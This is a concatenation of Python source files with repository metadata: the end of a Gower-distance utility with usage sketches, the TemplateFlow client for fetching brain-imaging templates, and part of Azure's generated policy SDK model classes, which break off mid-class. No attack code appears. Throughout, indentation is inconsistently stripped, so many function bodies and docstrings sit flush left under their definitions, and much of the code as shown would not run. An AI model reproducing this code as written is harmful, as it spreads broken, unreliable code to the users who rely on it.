sij_cat = np.where(xi_cat == xj_cat,np.zeros_like(xi_cat),np.ones_like(xi_cat))
sum_cat = np.multiply(feature_weight_cat,sij_cat).sum(axis=1)
# numerical columns
abs_delta=np.absolute(xi_num-xj_num)
sij_num=np.divide(abs_delta, ranges_of_numeric, out=np.zeros_like(abs_delta), where=ranges_of_numeric!=0)
sum_num = np.multiply(feature_weight_num,sij_num).sum(axis=1)
sums= np.add(sum_cat,sum_num)
sum_sij = np.divide(sums,feature_weight_sum)
return sum_sij
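# Editor's note, a worked example of the weighted Gower dissimilarity computed above: for
# one categorical feature that differs (contributing 1) and one numeric feature with
# |xi - xj| / range = 0.2, unit weights give (1 + 0.2) / 2 = 0.6.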
def smallest_indices(ary, n):
    """Returns the n smallest indices from a numpy array."""
#n += 1
flat = np.nan_to_num(ary.flatten(), nan=999)
indices = np.argpartition(-flat, -n)[-n:]
indices = indices[np.argsort(flat[indices])]
#indices = np.delete(indices,0,0)
values = flat[indices]
return {'index': indices, 'values': values}
def gower_topn(data_x, data_y=None, weight=None, cat_features=None, n = 5):
    if data_x.shape[0] >= 2: raise TypeError("Only support `data_x` of 1 row.")
dm = gower_matrix(data_x, data_y, weight, cat_features)
return smallest_indices(np.nan_to_num(dm[0], nan=1),n)
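# --- usage sketch (editor's addition; the toy DataFrame below is illustrative only) ---
if __name__ == '__main__':
    X = pd.DataFrame({
        'age': [21, 30, 45],
        'gender': ['M', 'F', 'F'],
        'salary': [3000.0, 4500.0, 4000.0],
    })
    # Pairwise Gower distances; categorical columns are inferred from the dtypes.
    print(gower_matrix(X))
    # Index and distance of the row (among the remaining rows) closest to the first row.
    print(gower_topn(X.iloc[0:1, :], X.iloc[1:, :], n=1))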
avg_line_length: 33.292857 | max_line_length: 109 | alphanum_fraction: 0.585497

hexsha: 1a867a87ab241adc3d387fd4b43ec71fc3e8b87a | size: 7,325 | ext: py | lang: Python
max_stars_repo: templateflow/api.py | rciric/templateflow-python-client | 96b9f1f949dd3cf8843ab91d041390c6944d1da7 | ["Apache-2.0"] | stars: null | null | null
max_issues_repo: templateflow/api.py | rciric/templateflow-python-client | 96b9f1f949dd3cf8843ab91d041390c6944d1da7 | ["Apache-2.0"] | issues: null | null | null
max_forks_repo: templateflow/api.py | rciric/templateflow-python-client | 96b9f1f949dd3cf8843ab91d041390c6944d1da7 | ["Apache-2.0"] | forks: null | null | null
"""TemplateFlow's Python Client."""
from json import loads
from pathlib import Path
import re
import sys
from .conf import TF_LAYOUT, TF_S3_ROOT, TF_USE_DATALAD, requires_layout
@requires_layout
def get(template, raise_empty=False, **kwargs):
"""
Fetch one file from one particular template.
Parameters
----------
template : str
A template identifier (e.g., ``MNI152NLin2009cAsym``).
raise_empty : bool, optional
Raise exception if no files were matched
Keyword Arguments
-----------------
resolution: int or None
        Index to a specific spatial resolution of the template.
suffix : str or None
BIDS suffix
atlas : str or None
Name of a particular atlas
hemi : str or None
Hemisphere
space : str or None
Space template is mapped to
density : str or None
Surface density
desc : str or None
Description field
Examples
--------
>>> str(get('MNI152Lin', resolution=1, suffix='T1w')) # doctest: +ELLIPSIS
'.../tpl-MNI152Lin/tpl-MNI152Lin_res-01_T1w.nii.gz'
>>> str(get('MNI152Lin', resolution=2, suffix='T1w')) # doctest: +ELLIPSIS
'.../tpl-MNI152Lin/tpl-MNI152Lin_res-02_T1w.nii.gz'
>>> [str(p) for p in get(
... 'MNI152Lin', suffix='T1w')] # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
['.../tpl-MNI152Lin/tpl-MNI152Lin_res-01_T1w.nii.gz',
'.../tpl-MNI152Lin/tpl-MNI152Lin_res-02_T1w.nii.gz']
>>> str(get('fsLR', space=None, hemi='L',
... density='32k', suffix='sphere')) # doctest: +ELLIPSIS
'.../tpl-fsLR_hemi-L_den-32k_sphere.surf.gii'
>>> get('fsLR', space='madeup')
[]
>>> get('fsLR', raise_empty=True, space='madeup') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
Exception:
...
"""
out_file = [
Path(p) for p in TF_LAYOUT.get(template=template, return_type="file", **kwargs)
]
# Try DataLad first
dl_missing = [p for p in out_file if not p.is_file()]
if TF_USE_DATALAD and dl_missing:
        for filepath in list(dl_missing):
_datalad_get(filepath)
dl_missing.remove(filepath)
# Fall-back to S3 if some files are still missing
s3_missing = [p for p in out_file if p.is_file() and p.stat().st_size == 0]
for filepath in s3_missing + dl_missing:
_s3_get(filepath)
not_fetched = [str(p) for p in out_file if not p.is_file() or p.stat().st_size == 0]
if not_fetched:
msg = "Could not fetch template files: %s." % ", ".join(not_fetched)
if dl_missing and not TF_USE_DATALAD:
msg += (
"""\
The $TEMPLATEFLOW_HOME folder %s seems to contain an initiated DataLad \
dataset, but the environment variable $TEMPLATEFLOW_USE_DATALAD is not \
set or set to one of (false, off, 0). Please set $TEMPLATEFLOW_USE_DATALAD \
on (possible values: true, on, 1)."""
% TF_LAYOUT.root
)
if s3_missing and TF_USE_DATALAD:
msg += (
"""\
The $TEMPLATEFLOW_HOME folder %s seems to contain a plain \
dataset, but the environment variable $TEMPLATEFLOW_USE_DATALAD is \
set to one of (true, on, 1). Please set $TEMPLATEFLOW_USE_DATALAD \
off (possible values: false, off, 0)."""
% TF_LAYOUT.root
)
raise RuntimeError(msg)
if not out_file and raise_empty:
raise Exception("No results found")
if len(out_file) == 1:
return out_file[0]
return out_file
@requires_layout
def templates(**kwargs):
"""
Return a list of available templates.
Keyword Arguments
-----------------
resolution: int or None
        Index to a specific spatial resolution of the template.
suffix : str or None
BIDS suffix
atlas : str
Name of a particular atlas
desc : str
Description field
Examples
--------
>>> base = ['MNI152Lin', 'MNI152NLin2009cAsym', 'NKI', 'OASIS30ANTs']
>>> tpls = templates()
>>> all([t in tpls for t in base])
True
>>> templates(suffix='PD')
['MNI152Lin', 'MNI152NLin2009cAsym', 'MNI152NLin2009cSym', 'MNIInfant', 'MNIPediatricAsym']
"""
return sorted(TF_LAYOUT.get_templates(**kwargs))
@requires_layout
def get_metadata(template):
"""
Fetch one file from one template.
Parameters
----------
template : str
A template identifier (e.g., ``MNI152NLin2009cAsym``).
Examples
--------
>>> get_metadata('MNI152Lin')['Name']
'Linear ICBM Average Brain (ICBM152) Stereotaxic Registration Model'
"""
tf_home = Path(TF_LAYOUT.root)
filepath = tf_home / ("tpl-%s" % template) / "template_description.json"
# Ensure that template is installed and file is available
if not filepath.is_file():
_datalad_get(filepath)
return loads(filepath.read_text())
def get_citations(template, bibtex=False):
"""
Fetch template citations
Parameters
----------
template : :obj:`str`
A template identifier (e.g., ``MNI152NLin2009cAsym``).
bibtex : :obj:`bool`, optional
Generate citations in BibTeX format.
"""
data = get_metadata(template)
refs = data.get("ReferencesAndLinks", [])
if isinstance(refs, dict):
refs = [x for x in refs.values()]
if not bibtex:
return refs
return [_to_bibtex(ref, template, idx).rstrip() for idx, ref in enumerate(refs, 1)]
def _datalad_get(filepath):
if not filepath:
return
from datalad import api
from datalad.support.exceptions import IncompleteResultsError
try:
api.get(str(filepath))
except IncompleteResultsError as exc:
if exc.failed[0]["message"] == "path not associated with any dataset":
from .conf import TF_GITHUB_SOURCE
api.install(path=TF_LAYOUT.root, source=TF_GITHUB_SOURCE, recursive=True)
api.get(str(filepath))
else:
raise
def _s3_get(filepath):
from sys import stderr
from tqdm import tqdm
import requests
path = str(filepath.relative_to(TF_LAYOUT.root))
url = "%s/%s" % (TF_S3_ROOT, path)
print("Downloading %s" % url, file=stderr)
# Streaming, so we can iterate over the response.
r = requests.get(url, stream=True)
# Total size in bytes.
total_size = int(r.headers.get("content-length", 0))
block_size = 1024
wrote = 0
    if filepath.is_file():
        filepath.unlink()
with filepath.open("wb") as f:
with tqdm(total=total_size, unit="B", unit_scale=True) as t:
for data in r.iter_content(block_size):
wrote = wrote + len(data)
f.write(data)
t.update(len(data))
if total_size != 0 and wrote != total_size:
        raise RuntimeError("Incomplete download of %s: got %d of %d bytes" % (url, wrote, total_size))
def _to_bibtex(doi, template, idx):
if "doi.org" not in doi:
return doi
# Is a DOI URL
import requests
response = requests.post(
doi,
headers={"Accept": "application/x-bibtex; charset=utf-8"}
)
if not response.ok:
print(
f"Failed to convert DOI <{doi}> to bibtex, returning URL.",
file=sys.stderr,
)
return doi
return response.text
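# --- usage sketch (editor's addition) ---
# Requires a populated $TEMPLATEFLOW_HOME or network access so missing files can be
# fetched; the template and suffix values mirror the doctests in get() above.
if __name__ == '__main__':
    t1w = get('MNI152Lin', resolution=1, suffix='T1w')
    print(t1w)
    for entry in get_citations('MNI152Lin', bibtex=True):
        print(entry)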
avg_line_length: 28.065134 | max_line_length: 95 | alphanum_fraction: 0.61884

hexsha: 8c5860b3a053d48c8b9628cb23c6108ed34ed02d | size: 40,411 | ext: py | lang: Python
max_stars_repo: venv/lib/python3.8/site-packages/azure/mgmt/resource/policy/v2020_09_01/models/_models_py3.py | amcclead7336/Enterprise_Data_Science_Final | ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28 | ["Unlicense", "MIT"] | stars: null | null | null
max_issues_repo: venv/lib/python3.8/site-packages/azure/mgmt/resource/policy/v2020_09_01/models/_models_py3.py | amcclead7336/Enterprise_Data_Science_Final | ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28 | ["Unlicense", "MIT"] | issues: null | null | null
max_forks_repo: venv/lib/python3.8/site-packages/azure/mgmt/resource/policy/v2020_09_01/models/_models_py3.py | amcclead7336/Enterprise_Data_Science_Final | ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28 | ["Unlicense", "MIT"] | forks: 2 | 2021-05-23T16:46:31.000Z | 2021-05-26T23:51:09.000Z
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class Alias(Model):
    """The alias type.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: The alias name.
:type name: str
:param paths: The paths for an alias.
:type paths:
list[~azure.mgmt.resource.policy.v2020_09_01.models.AliasPath]
:param type: The type of the alias. Possible values include:
'NotSpecified', 'PlainText', 'Mask'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasType
:param default_path: The default path for an alias.
:type default_path: str
:param default_pattern: The default pattern for an alias.
:type default_pattern:
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPattern
:ivar default_metadata: The default alias path metadata. Applies to the
default path and to any alias path that doesn't have metadata
:vartype default_metadata:
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathMetadata
"""
_validation = {
'default_metadata': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'paths': {'key': 'paths', 'type': '[AliasPath]'},
'type': {'key': 'type', 'type': 'AliasType'},
'default_path': {'key': 'defaultPath', 'type': 'str'},
'default_pattern': {'key': 'defaultPattern', 'type': 'AliasPattern'},
'default_metadata': {'key': 'defaultMetadata', 'type': 'AliasPathMetadata'},
}
def __init__(self, *, name: str=None, paths=None, type=None, default_path: str=None, default_pattern=None, **kwargs) -> None:
super(Alias, self).__init__(**kwargs)
self.name = name
self.paths = paths
self.type = type
self.default_path = default_path
self.default_pattern = default_pattern
self.default_metadata = None
class AliasPath(Model):
"""The type of the paths for alias.
Variables are only populated by the server, and will be ignored when
sending a request.
:param path: The path of an alias.
:type path: str
:param api_versions: The API versions.
:type api_versions: list[str]
:param pattern: The pattern for an alias path.
:type pattern: ~azure.mgmt.resource.policy.v2020_09_01.models.AliasPattern
:ivar metadata: The metadata of the alias path. If missing, fall back to
the default metadata of the alias.
:vartype metadata:
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathMetadata
"""
_validation = {
'metadata': {'readonly': True},
}
_attribute_map = {
'path': {'key': 'path', 'type': 'str'},
'api_versions': {'key': 'apiVersions', 'type': '[str]'},
'pattern': {'key': 'pattern', 'type': 'AliasPattern'},
'metadata': {'key': 'metadata', 'type': 'AliasPathMetadata'},
}
def __init__(self, *, path: str=None, api_versions=None, pattern=None, **kwargs) -> None:
super(AliasPath, self).__init__(**kwargs)
self.path = path
self.api_versions = api_versions
self.pattern = pattern
self.metadata = None
class AliasPathMetadata(Model):
"""AliasPathMetadata.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar type: The type of the token that the alias path is referring to.
Possible values include: 'NotSpecified', 'Any', 'String', 'Object',
'Array', 'Integer', 'Number', 'Boolean'
:vartype type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathTokenType
:ivar attributes: The attributes of the token that the alias path is
referring to. Possible values include: 'None', 'Modifiable'
:vartype attributes: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPathAttributes
"""
_validation = {
'type': {'readonly': True},
'attributes': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(AliasPathMetadata, self).__init__(**kwargs)
self.type = None
self.attributes = None
class AliasPattern(Model):
"""The type of the pattern for an alias path.
:param phrase: The alias pattern phrase.
:type phrase: str
:param variable: The alias pattern variable.
:type variable: str
:param type: The type of alias pattern. Possible values include:
'NotSpecified', 'Extract'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.AliasPatternType
"""
_attribute_map = {
'phrase': {'key': 'phrase', 'type': 'str'},
'variable': {'key': 'variable', 'type': 'str'},
'type': {'key': 'type', 'type': 'AliasPatternType'},
}
def __init__(self, *, phrase: str=None, variable: str=None, type=None, **kwargs) -> None:
super(AliasPattern, self).__init__(**kwargs)
self.phrase = phrase
self.variable = variable
self.type = type
class CloudError(Model):
"""An error response from a policy operation.
:param error:
:type error: ~azure.mgmt.resource.policy.v2020_09_01.models.ErrorResponse
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorResponse'},
}
def __init__(self, *, error=None, **kwargs) -> None:
super(CloudError, self).__init__(**kwargs)
self.error = error
class CloudErrorException(HttpOperationError):
    """Server responded with exception of type: 'CloudError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(CloudErrorException, self).__init__(deserialize, response, 'CloudError', *args)
class DataEffect(Model):
"""The data effect definition.
:param name: The data effect name.
:type name: str
:param details_schema: The data effect details schema.
:type details_schema: object
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'details_schema': {'key': 'detailsSchema', 'type': 'object'},
}
def __init__(self, *, name: str=None, details_schema=None, **kwargs) -> None:
super(DataEffect, self).__init__(**kwargs)
self.name = name
self.details_schema = details_schema
class DataManifestCustomResourceFunctionDefinition(Model):
"""The custom resource function definition.
:param name: The function name as it will appear in the policy rule. eg -
'vault'.
:type name: str
:param fully_qualified_resource_type: The fully qualified control plane
resource type that this function represents. eg -
'Microsoft.KeyVault/vaults'.
:type fully_qualified_resource_type: str
:param default_properties: The top-level properties that can be selected
on the function's output. eg - [ "name", "location" ] if vault().name and
vault().location are supported
:type default_properties: list[str]
:param allow_custom_properties: A value indicating whether the custom
properties within the property bag are allowed. Needs api-version to be
specified in the policy rule eg - vault('2019-06-01').
:type allow_custom_properties: bool
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'fully_qualified_resource_type': {'key': 'fullyQualifiedResourceType', 'type': 'str'},
'default_properties': {'key': 'defaultProperties', 'type': '[str]'},
'allow_custom_properties': {'key': 'allowCustomProperties', 'type': 'bool'},
}
def __init__(self, *, name: str=None, fully_qualified_resource_type: str=None, default_properties=None, allow_custom_properties: bool=None, **kwargs) -> None:
super(DataManifestCustomResourceFunctionDefinition, self).__init__(**kwargs)
self.name = name
self.fully_qualified_resource_type = fully_qualified_resource_type
self.default_properties = default_properties
self.allow_custom_properties = allow_custom_properties
class DataPolicyManifest(Model):
"""The data policy manifest.
Variables are only populated by the server, and will be ignored when
sending a request.
:param namespaces: The list of namespaces for the data policy manifest.
:type namespaces: list[str]
:param policy_mode: The policy mode of the data policy manifest.
:type policy_mode: str
:param is_built_in_only: A value indicating whether policy mode is allowed
only in built-in definitions.
:type is_built_in_only: bool
:param resource_type_aliases: An array of resource type aliases.
:type resource_type_aliases:
list[~azure.mgmt.resource.policy.v2020_09_01.models.ResourceTypeAliases]
:param effects: The effect definition.
:type effects:
list[~azure.mgmt.resource.policy.v2020_09_01.models.DataEffect]
:param field_values: The non-alias field accessor values that can be used
in the policy rule.
:type field_values: list[str]
:param standard: The standard resource functions (subscription and/or
resourceGroup).
:type standard: list[str]
:param custom: An array of data manifest custom resource definition.
:type custom:
list[~azure.mgmt.resource.policy.v2020_09_01.models.DataManifestCustomResourceFunctionDefinition]
:ivar id: The ID of the data policy manifest.
:vartype id: str
:ivar name: The name of the data policy manifest (it's the same as the
Policy Mode).
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/dataPolicyManifests).
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'namespaces': {'key': 'properties.namespaces', 'type': '[str]'},
'policy_mode': {'key': 'properties.policyMode', 'type': 'str'},
'is_built_in_only': {'key': 'properties.isBuiltInOnly', 'type': 'bool'},
'resource_type_aliases': {'key': 'properties.resourceTypeAliases', 'type': '[ResourceTypeAliases]'},
'effects': {'key': 'properties.effects', 'type': '[DataEffect]'},
'field_values': {'key': 'properties.fieldValues', 'type': '[str]'},
'standard': {'key': 'properties.resourceFunctions.standard', 'type': '[str]'},
'custom': {'key': 'properties.resourceFunctions.custom', 'type': '[DataManifestCustomResourceFunctionDefinition]'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, namespaces=None, policy_mode: str=None, is_built_in_only: bool=None, resource_type_aliases=None, effects=None, field_values=None, standard=None, custom=None, **kwargs) -> None:
super(DataPolicyManifest, self).__init__(**kwargs)
self.namespaces = namespaces
self.policy_mode = policy_mode
self.is_built_in_only = is_built_in_only
self.resource_type_aliases = resource_type_aliases
self.effects = effects
self.field_values = field_values
self.standard = standard
self.custom = custom
self.id = None
self.name = None
self.type = None
class ErrorAdditionalInfo(Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: object
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(self, **kwargs) -> None:
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorResponse(Model):
"""Error Response.
Common error response for all Azure Resource Manager APIs to return error
details for failed operations. (This also follows the OData error response
format.).
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details:
list[~azure.mgmt.resource.policy.v2020_09_01.models.ErrorResponse]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~azure.mgmt.resource.policy.v2020_09_01.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorResponse]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(self, **kwargs) -> None:
super(ErrorResponse, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class Identity(Model):
"""Identity for the resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar principal_id: The principal ID of the resource identity.
:vartype principal_id: str
:ivar tenant_id: The tenant ID of the resource identity.
:vartype tenant_id: str
:param type: The identity type. This is the only required field when
adding a system assigned identity to a resource. Possible values include:
'SystemAssigned', 'None'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.ResourceIdentityType
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'ResourceIdentityType'},
}
def __init__(self, *, type=None, **kwargs) -> None:
super(Identity, self).__init__(**kwargs)
self.principal_id = None
self.tenant_id = None
self.type = type
class NonComplianceMessage(Model):
"""A message that describes why a resource is non-compliant with the policy.
This is shown in 'deny' error messages and on resource's non-compliant
compliance results.
All required parameters must be populated in order to send to Azure.
:param message: Required. A message that describes why a resource is
non-compliant with the policy. This is shown in 'deny' error messages and
on resource's non-compliant compliance results.
:type message: str
:param policy_definition_reference_id: The policy definition reference ID
within a policy set definition the message is intended for. This is only
applicable if the policy assignment assigns a policy set definition. If
this is not provided the message applies to all policies assigned by this
policy assignment.
:type policy_definition_reference_id: str
"""
_validation = {
'message': {'required': True},
}
_attribute_map = {
'message': {'key': 'message', 'type': 'str'},
'policy_definition_reference_id': {'key': 'policyDefinitionReferenceId', 'type': 'str'},
}
def __init__(self, *, message: str, policy_definition_reference_id: str=None, **kwargs) -> None:
super(NonComplianceMessage, self).__init__(**kwargs)
self.message = message
self.policy_definition_reference_id = policy_definition_reference_id
class ParameterDefinitionsValue(Model):
"""The definition of a parameter that can be provided to the policy.
:param type: The data type of the parameter. Possible values include:
'String', 'Array', 'Object', 'Boolean', 'Integer', 'Float', 'DateTime'
:type type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterType
:param allowed_values: The allowed values for the parameter.
:type allowed_values: list[object]
:param default_value: The default value for the parameter if no value is
provided.
:type default_value: object
:param metadata: General metadata for the parameter.
:type metadata:
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterDefinitionsValueMetadata
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'allowed_values': {'key': 'allowedValues', 'type': '[object]'},
'default_value': {'key': 'defaultValue', 'type': 'object'},
'metadata': {'key': 'metadata', 'type': 'ParameterDefinitionsValueMetadata'},
}
def __init__(self, *, type=None, allowed_values=None, default_value=None, metadata=None, **kwargs) -> None:
super(ParameterDefinitionsValue, self).__init__(**kwargs)
self.type = type
self.allowed_values = allowed_values
self.default_value = default_value
self.metadata = metadata
class ParameterDefinitionsValueMetadata(Model):
"""General metadata for the parameter.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param display_name: The display name for the parameter.
:type display_name: str
:param description: The description of the parameter.
:type description: str
:param strong_type: Used when assigning the policy definition through the
portal. Provides a context aware list of values for the user to choose
from.
:type strong_type: str
:param assign_permissions: Set to true to have Azure portal create role
assignments on the resource ID or resource scope value of this parameter
during policy assignment. This property is useful in case you wish to
assign permissions outside the assignment scope.
:type assign_permissions: bool
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'display_name': {'key': 'displayName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'strong_type': {'key': 'strongType', 'type': 'str'},
'assign_permissions': {'key': 'assignPermissions', 'type': 'bool'},
}
def __init__(self, *, additional_properties=None, display_name: str=None, description: str=None, strong_type: str=None, assign_permissions: bool=None, **kwargs) -> None:
super(ParameterDefinitionsValueMetadata, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.display_name = display_name
self.description = description
self.strong_type = strong_type
self.assign_permissions = assign_permissions
class ParameterValuesValue(Model):
"""The value of a parameter.
:param value: The value of the parameter.
:type value: object
"""
_attribute_map = {
'value': {'key': 'value', 'type': 'object'},
}
def __init__(self, *, value=None, **kwargs) -> None:
super(ParameterValuesValue, self).__init__(**kwargs)
self.value = value
class PolicyAssignment(Model):
"""The policy assignment.
Variables are only populated by the server, and will be ignored when
sending a request.
:param display_name: The display name of the policy assignment.
:type display_name: str
:param policy_definition_id: The ID of the policy definition or policy set
definition being assigned.
:type policy_definition_id: str
:ivar scope: The scope for the policy assignment.
:vartype scope: str
:param not_scopes: The policy's excluded scopes.
:type not_scopes: list[str]
:param parameters: The parameter values for the assigned policy rule. The
keys are the parameter names.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterValuesValue]
:param description: This message will be part of response in case of
policy violation.
:type description: str
:param metadata: The policy assignment metadata. Metadata is an open ended
object and is typically a collection of key value pairs.
:type metadata: object
:param enforcement_mode: The policy assignment enforcement mode. Possible
values are Default and DoNotEnforce. Possible values include: 'Default',
'DoNotEnforce'. Default value: "Default" .
:type enforcement_mode: str or
~azure.mgmt.resource.policy.v2020_09_01.models.EnforcementMode
:param non_compliance_messages: The messages that describe why a resource
is non-compliant with the policy.
:type non_compliance_messages:
list[~azure.mgmt.resource.policy.v2020_09_01.models.NonComplianceMessage]
:ivar id: The ID of the policy assignment.
:vartype id: str
:ivar type: The type of the policy assignment.
:vartype type: str
:ivar name: The name of the policy assignment.
:vartype name: str
:param location: The location of the policy assignment. Only required when
utilizing managed identity.
:type location: str
:param identity: The managed identity associated with the policy
assignment.
:type identity: ~azure.mgmt.resource.policy.v2020_09_01.models.Identity
"""
_validation = {
'scope': {'readonly': True},
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
}
_attribute_map = {
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'policy_definition_id': {'key': 'properties.policyDefinitionId', 'type': 'str'},
'scope': {'key': 'properties.scope', 'type': 'str'},
'not_scopes': {'key': 'properties.notScopes', 'type': '[str]'},
'parameters': {'key': 'properties.parameters', 'type': '{ParameterValuesValue}'},
'description': {'key': 'properties.description', 'type': 'str'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'enforcement_mode': {'key': 'properties.enforcementMode', 'type': 'str'},
'non_compliance_messages': {'key': 'properties.nonComplianceMessages', 'type': '[NonComplianceMessage]'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
}
def __init__(self, *, display_name: str=None, policy_definition_id: str=None, not_scopes=None, parameters=None, description: str=None, metadata=None, enforcement_mode="Default", non_compliance_messages=None, location: str=None, identity=None, **kwargs) -> None:
super(PolicyAssignment, self).__init__(**kwargs)
self.display_name = display_name
self.policy_definition_id = policy_definition_id
self.scope = None
self.not_scopes = not_scopes
self.parameters = parameters
self.description = description
self.metadata = metadata
self.enforcement_mode = enforcement_mode
self.non_compliance_messages = non_compliance_messages
self.id = None
self.type = None
self.name = None
self.location = location
self.identity = identity
class PolicyDefinition(Model):
"""The policy definition.
Variables are only populated by the server, and will be ignored when
sending a request.
:param policy_type: The type of policy definition. Possible values are
NotSpecified, BuiltIn, Custom, and Static. Possible values include:
'NotSpecified', 'BuiltIn', 'Custom', 'Static'
:type policy_type: str or
~azure.mgmt.resource.policy.v2020_09_01.models.PolicyType
:param mode: The policy definition mode. Some examples are All, Indexed,
Microsoft.KeyVault.Data. Default value: "Indexed" .
:type mode: str
:param display_name: The display name of the policy definition.
:type display_name: str
:param description: The policy definition description.
:type description: str
:param policy_rule: The policy rule.
:type policy_rule: object
:param metadata: The policy definition metadata. Metadata is an open
ended object and is typically a collection of key value pairs.
:type metadata: object
:param parameters: The parameter definitions for parameters used in the
policy rule. The keys are the parameter names.
:type parameters: dict[str,
~azure.mgmt.resource.policy.v2020_09_01.models.ParameterDefinitionsValue]
:ivar id: The ID of the policy definition.
:vartype id: str
:ivar name: The name of the policy definition.
:vartype name: str
:ivar type: The type of the resource
(Microsoft.Authorization/policyDefinitions).
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'policy_type': {'key': 'properties.policyType', 'type': 'str'},
'mode': {'key': 'properties.mode', 'type': 'str'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'policy_rule': {'key': 'properties.policyRule', 'type': 'object'},
'metadata': {'key': 'properties.metadata', 'type': 'object'},
'parameters': {'key': 'properties.parameters', 'type': '{ParameterDefinitionsValue}'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, policy_type=None, mode: str="Indexed", display_name: str=None, description: str=None, policy_rule=None, metadata=None, parameters=None, **kwargs) -> None:
super(PolicyDefinition, self).__init__(**kwargs)
self.policy_type = policy_type
self.mode = mode
self.display_name = display_name
self.description = description
self.policy_rule = policy_rule
self.metadata = metadata
self.parameters = parameters
self.id = None
self.name = None
self.type = None
class PolicyDefinitionGroup(Model):
"""The policy definition group.
All required parameters must be populated in order to send to Azure.
:param name: Required. The name of the group.
:type name: str
:param display_name: The group's display name.
:type display_name: str
:param category: The group's category.
:type category: str
:param description: The group's description.
:type description: str
:param additional_metadata_id: A resource ID of a resource that contains
additional metadata about the group.
:type additional_metadata_id: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'additional_metadata_id': {'key': 'additionalMetadataId', 'type': 'str'},
}
def __init__(self, *, name: str, display_name: str=None, category: str=None, description: str=None, additional_metadata_id: str=None, **kwargs) -> None:
super(PolicyDefinitionGroup, self).__init__(**kwargs)
self.name = name
self.display_name = display_name
